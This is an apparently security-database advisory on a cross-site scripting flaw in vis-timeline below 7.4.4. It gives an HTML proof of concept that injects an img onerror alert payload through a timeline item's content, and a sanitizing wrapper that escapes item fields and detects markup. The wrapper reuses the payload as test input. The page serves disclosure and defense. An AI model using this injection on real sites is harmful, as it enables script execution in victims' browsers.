vis-timeline@7.4.0 vulnerabilities

Create a fully customizable, interactive timeline with items and ranges.

Direct Vulnerabilities

Known vulnerabilities in the vis-timeline package. This does not include vulnerabilities belonging to this package’s dependencies.

Vulnerability: Cross-site Scripting (XSS) (severity: M)

vis-timeline (Timeline/Graph2D) is an interactive visualization chart for visualizing data in time.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). Item content is rendered as HTML, so an attacker who can control the items of a Timeline element can inject additional script code into the generated application.

PoC

<!DOCTYPE html>
<html>
  <head>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/vis-timeline/7.4.3/vis-timeline-graph2d.min.js" integrity="sha512-3FADGlV0gOpnQn56VOryrvOeY1zMrNiSMyDnxD/5ZEBJgt5n+IcAvfzm16/Cwyhro9RJgFgBWeoUmLceNgbTrA==" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/vis-timeline/7.4.3/vis-timeline-graph2d.css" integrity="sha512-GFG4HXPbPcM487tbwN4sscz1AVK9uQcY7Y6uWwLlgWbAXCJI2V/n7Em7vKpH+Q1cqQh1PyCavHr94KaWi0UgOA==" crossorigin="anonymous" />
    <style>
      body,
      html {
        font-family: sans-serif;
      }
    </style>
  </head>
  <body>
    <p>A basic timeline. You can move and zoom the timeline, and select items.</p>
    <div id="visualization"></div>
    <script>
      // DOM element where the Timeline will be attached
      var container = document.getElementById("visualization");

      // Create a DataSet (allows two way data-binding).
      // Item 1 carries the payload: its content string is inserted as HTML,
      // so the <img> onerror handler runs when the timeline renders it.
      var items = new vis.DataSet([
        { id: 1, content: "item<img src='xxx' onerror='alert(/XSS/);' />", start: "2014-04-20" },
        { id: 2, content: "item 2", start: "2014-04-14" },
        { id: 3, content: "item 3", start: "2014-04-18" },
        { id: 4, content: "item 4", start: "2014-04-16", end: "2014-04-19" },
        { id: 5, content: "item 5", start: "2014-04-25" },
        { id: 6, content: "item 6", start: "2014-04-27", type: "point" },
      ]);

      // Configuration for the Timeline
      var options = {};
      var timeline = new vis.Timeline(container, items, options);
    </script>
  </body>
</html>

How to fix Cross-site Scripting (XSS)?

Upgrade vis-timeline to version 7.4.4 or higher.
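As an added example (not from this advisory or the vis-timeline project), the following defense-in-depth wrapper HTML-escapes untrusted item fields and validates dates and item types before the records are handed to vis.DataSet, so the PoC payload above renders as literal text even on a build that has not yet been upgraded. The untrusted-JSON source, the escaping of the `title` field and the allowed-type list are assumptions made for this example.

```javascript
// Added example, not vis-timeline's own code. Assumes item records come
// from an untrusted source (e.g. a JSON API) and must never reach the
// timeline as raw HTML.

// Item types documented by vis-timeline; anything else is rejected.
const ALLOWED_TYPES = new Set(["box", "point", "range", "background"]);

// Escape the characters that matter in HTML text and attribute context.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Heuristic used only for logging/alerting: does a field contain markup
// or an inline event handler? Escaping happens regardless of the result.
function looksLikeMarkup(value) {
  const s = String(value);
  return /<\s*[a-z!\/]/i.test(s) || /\bon\w+\s*=/i.test(s);
}

// Return a safe copy of each item plus the ids that carried markup.
function sanitizeTimelineItems(untrustedItems) {
  const flagged = [];
  const items = untrustedItems.map((raw, idx) => {
    const item = { id: raw.id ?? idx, content: escapeHtml(raw.content ?? "") };
    if (looksLikeMarkup(raw.content)) flagged.push(item.id);
    if (raw.title !== undefined) item.title = escapeHtml(raw.title); // assumption: title also rendered
    for (const key of ["start", "end"]) {
      if (raw[key] === undefined) continue;
      const t = Date.parse(raw[key]);
      if (Number.isNaN(t)) throw new Error(`item ${item.id}: invalid ${key}`);
      item[key] = new Date(t).toISOString();
    }
    if (raw.type !== undefined) {
      if (!ALLOWED_TYPES.has(raw.type)) throw new Error(`item ${item.id}: unknown type`);
      item.type = raw.type;
    }
    return item;
  });
  return { items, flagged };
}

// Constructed input reusing the payload from the PoC above.
const untrusted = [
  { id: 1, content: "item<img src='xxx' onerror='alert(/XSS/);' />", start: "2014-04-20" },
  { id: 2, content: "item 2", start: "2014-04-14" },
];
const result = sanitizeTimelineItems(untrusted);
// In the browser: new vis.Timeline(container, new vis.DataSet(result.items), {});
```

`result.flagged` lists the ids whose content contained markup, which is the signal to log or alert on; the escaped items are what gets rendered.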

Vulnerable version: <7.4.4